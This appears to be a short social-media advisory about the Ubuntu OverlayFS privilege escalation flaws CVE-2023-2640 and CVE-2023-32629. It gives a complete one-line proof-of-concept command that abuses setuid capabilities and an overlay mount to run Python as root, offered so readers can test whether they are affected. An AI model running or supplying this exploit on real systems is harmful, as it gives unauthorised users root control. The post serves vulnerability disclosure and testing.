#ubuntu local privilege escalation

CVE-2023-2640 CVE-2023-32629

A critical privilege escalation vulnerability in the Ubuntu kernel regarding OverlayFS have been identified.

It basically allows a low privileged user account on your system to obtain root privileges.

Public exploit code was published already and is quite easy to exploit.

If you want to test whether your system is affected, you may execute the following PoC code from a low privileged user account on your Ubuntu system. If you get an output, telling you the root account's id, then you are affected.

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; u/python3 -c 'import os;os.setuid(0);os.system(\"id\")'";rm -rf l u w m

Reference

https://nvd.nist.gov/vuln/detail/CVE-2023-32629

#ethicalhacking #infosec #cybersecurity #nostr